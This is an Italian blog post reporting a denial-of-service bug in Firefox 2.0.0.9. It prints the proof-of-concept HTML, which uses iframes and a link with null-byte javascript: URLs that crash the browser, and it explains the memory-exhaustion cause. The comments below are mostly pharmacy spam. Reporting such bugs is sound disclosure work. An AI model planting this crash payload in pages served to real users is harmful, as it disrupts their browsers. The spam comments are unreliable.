Remote DOS per Firefox 2.0.0.9

E’ stato individuato un bug che renderebbe vulnerabile Firefox 2.0.0.9 ad attacchi del tipo Denial Of Service.

L’attacco consisterebbe nelle seguenti righe di codice e permetterebbe ad un attaccante di far crashare il noto browser:

<script></script>

<iframe id="a" src="javascript:document.location='\x00res://'" width="100%" height="200"></iframe>

<iframe id="b" src="javascript:document.location='\x00about:config'" width="100%" height="200"></iframe>

<a href="#" onclick="javascript:document.location='\x00file:///'">test 1</a>

IL PoC lo trovate  cliccando quì. (Attenzione se usate firefox 2.0.0.9 con javascript abilitato il browser crasherà, disabilitandolo dovreste riuscire a farla franca, mentre Iexplorer non vi farà accedere alla pagina incriminata)

Il bug dovrebbe risiedere nel mancato controllo della dimensione dei caratteri nei messaggi di errore. Se infatti il testo del messaggio è troppo  piccolo, del tipo minore di 512 bytes, IExplorer ritornerà un proprio messaggio di errore evitando quindi il bug, mentre Firefox comincerà a risucchiare memoria fino al crash.

Via

  • Print this article!
  • Digg
  • Sphinn
  • del.icio.us
  • Facebook
  • Google Bookmarks
  • Technotizie
  • FriendFeed
  • IndianPad
  • Live
  • Netvibes
  • Netvouz
  • NewsVine
  • Reddit
  • Segnalo
  • Slashdot
  • StumbleUpon
  • Twitter
  • Yahoo! Bookmarks

Commenti

  1. 5 comments su “Remote DOS per Firefox 2.0.0.9”

  1. [...] Dopo l’articolo sul DOS di Firefox 2.0.0.9 [...]

    Posted by Antonio Trigiani w3bL0g - Informatica Virale » Blog Archive » Google Vulnerabile ad attacchi XSS. 0day | novembre 10, 2007, 15:36
  2. Hello! dkgbgce interesting dkgbgce site! I’m really like it! Very, very dkgbgce good!

    Posted by Pharmd344 | aprile 24, 2014, 18:39
  3. Very nice site! cheap viagra

    Posted by Pharmd824 | aprile 24, 2014, 18:39
  4. Very nice site! [url=http://opeaixy.com/qsqsqa/2.html]cheap cialis[/url]

    Posted by Pharmc293 | aprile 24, 2014, 18:39
  5. Very nice site!

    Posted by Pharmg840 | aprile 24, 2014, 18:40

Inserisci un commento